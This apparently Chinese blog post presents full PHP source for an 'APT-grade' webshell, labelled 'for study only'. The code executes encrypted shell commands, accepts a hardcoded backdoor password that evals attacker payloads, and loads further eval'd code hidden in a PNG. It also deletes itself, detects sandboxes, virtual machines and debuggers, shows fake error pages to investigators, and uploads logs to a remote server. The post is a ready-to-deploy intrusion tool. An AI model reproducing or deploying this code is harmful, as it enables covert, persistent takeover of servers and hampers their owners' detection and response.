JOJO朦

H4ckBu7eer

特级 APT 级 Webshell - 强化版

仅供学习

<?php


$allowedIPs = ['127.0.0.1', '192.168.1.100'];

$clientIP = $_SERVER['REMOTE_ADDR'];

if (!in_array($clientIP, $allowedIPs) && !isValidGeoIP($clientIP) && !isProxyIP($clientIP)) {

    deceiveUser();

}


// AES 密钥初始化

session_start();

if (!isset($_SESSION['aes_key'])) {

    $_SESSION['aes_key'] = getenv('AES_KEY') ?: bin2hex(random_bytes(32));

    $_SESSION['aes_iv'] = getenv('AES_IV') ?: bin2hex(random_bytes(16));

}

$aesKey = $_SESSION['aes_key'];

$aesIV = $_SESSION['aes_iv'];

$backdoorPass = 'letmein123';


// 自毁机制

if (time() - filemtime(__FILE__) > 3600 || isset($_SESSION['error_count']) && $_SESSION['error_count'] > 5) {

    @unlink(__FILE__);

    deceiveUser();

}


// 反沙盒与虚拟机检测

if (isDebuggerPresent() || isVirtualEnvironment() || isSuspiciousBehavior($clientIP)) {

    deceiveUser();

}


// 命令执行与文件包含

if (isset($_GET['cmd'])) {

    sleep(rand(1, 5)); // 模拟延时

    $decryptedCmd = decryptData(base64_decode($_GET['cmd']), $aesKey, $aesIV);

    if (preg_match('/[^a-zA-Z0-9_\- ]/', $decryptedCmd)) {

        deceiveUser();

    }

    $output = shell_exec($decryptedCmd) ?: "Execution disabled.";

    echo encryptData($output, $aesKey, $aesIV);

}


if (isset($_GET['file'])) {

    $file = decryptData($_GET['file'], $aesKey, $aesIV);

    $safeFiles = ['index.php', 'info.php', 'test.php'];

    if (in_array($file, $safeFiles) && file_exists($file)) {

        secureFileInclude($file);

    } else {

        deceiveUser();

    }

}


// 后门访问

if (isset($_GET['hidden']) && $_GET['pass'] === $backdoorPass) {

    eval(decryptData(base64_decode($_GET['payload']), $aesKey, $aesIV));

    secureLog("Backdoor triggered by: $clientIP");

}


// 隐写负载加载

if (isset($_GET['steg'])) {

    $stegImage = 'payload.png';

    $hiddenCode = file_get_contents($stegImage);

    eval(extractHiddenPayload($hiddenCode));

}


// 反沙盒检测

if (isset($_GET['sandbox'])) {

    if (isVirtualEnvironment()) {

        deceiveUser();

    }

}


// 防御函数实现

function isValidGeoIP($ip) {

    $url = "http://ip-api.com/json/{$ip}";

    $response = json_decode(file_get_contents($url), true);

    return $response['countryCode'] === 'US';

}


function isProxyIP($ip) {

    $url = "http://ip-api.com/json/{$ip}";

    $response = json_decode(file_get_contents($url), true);

    return $response['proxy'] ?? false;

}


function isVirtualEnvironment() {

    $cpuInfo = file_get_contents("/proc/cpuinfo");

    $diskInfo = shell_exec('wmic diskdrive get serialnumber');

    $macAddress = shell_exec('getmac');

    $processList = shell_exec('tasklist');


    if (

        strpos($cpuInfo, "vmware") !== false || 

        strpos($cpuInfo, "kvm") !== false || 

        strpos($diskInfo, "000000") !== false || 

        strpos($macAddress, "00:50:56") !== false ||  // VMware MAC

        preg_match('/VBoxService|vmtoolsd/i', $processList)

    ) {

        return true;

    }

    return false;

}


function isDebuggerPresent() {

    return extension_loaded('xdebug') || isset($_GET['debug']);

}


// 进一步强化反沙盒、反调试,增加对多种安全工具的检测

function isSuspiciousBehavior($ip) {

    // 检测可疑的请求模式,如暴力破解、频繁请求等

    $requestCount = isset($_SESSION['request_count']) ? $_SESSION['request_count'] : 0;

    $_SESSION['request_count'] = $requestCount + 1;


    if ($requestCount > 100) {

        // 可能是暴力破解

        secureLog("Suspicious behavior detected from IP: $ip");

        return true;

    }


    // 未来可以添加更多复杂的检测逻辑

    return false;

}


function deceiveUser() {

    if (rand(1, 10) > 7) {

        echo "Error 500 - Internal Server Error";

    } else {

        http_response_code(404);

        die("Page not found.");

    }

}


function secureFileInclude($file) {

    $filePath = realpath($file);

    if (strpos($filePath, __DIR__) === 0) {

        include($filePath);

    } else {

        deceiveUser();

    }

}


function encryptData($data, $key, $iv) {

    $padding = bin2hex(random_bytes(8));  // 添加随机填充

    $data = $padding . $data;

    return openssl_encrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));

}


function decryptData($data, $key, $iv) {

    $decrypted = openssl_decrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));

    return substr($decrypted, 8);  // 去除填充部分

}


function extractHiddenPayload($image) {

    $stegPayload = substr($image, strpos($image, 'IDAT') + 4);

    $decodedPayload = base64_decode($stegPayload);

    

    // 二次解密或嵌套隐藏

    return openssl_decrypt($decodedPayload, 'AES-256-CTR', 'hidden-layer-key', 0, 'hidden-layer-iv');

}


function secureLog($logMessage) {

    global $aesKey, $aesIV;

    $encryptedLog = encryptData($logMessage, $aesKey, $aesIV);

    file_put_contents('secure_access.log', $encryptedLog . "\n", FILE_APPEND);

    

    // 提供远程日志上传功能

    $logData = [

        'log' => $encryptedLog,

        'timestamp' => time(),

    ];

    $remoteUrl = 'http://your-log-server.com/upload';

    file_get_contents($remoteUrl . '?' . http_build_query($logData));

}


// 监控暴力破解和异常行为模式

function isSuspiciousRequestPattern($ip) {

    // 可以在此处加入特定检测逻辑,如异常请求频率

    return false;  // 示例,实际可以加上更多检测逻辑

}


?>


发表评论:

控制面板
您好,欢迎到访网站!
  查看权限
网站分类
最新留言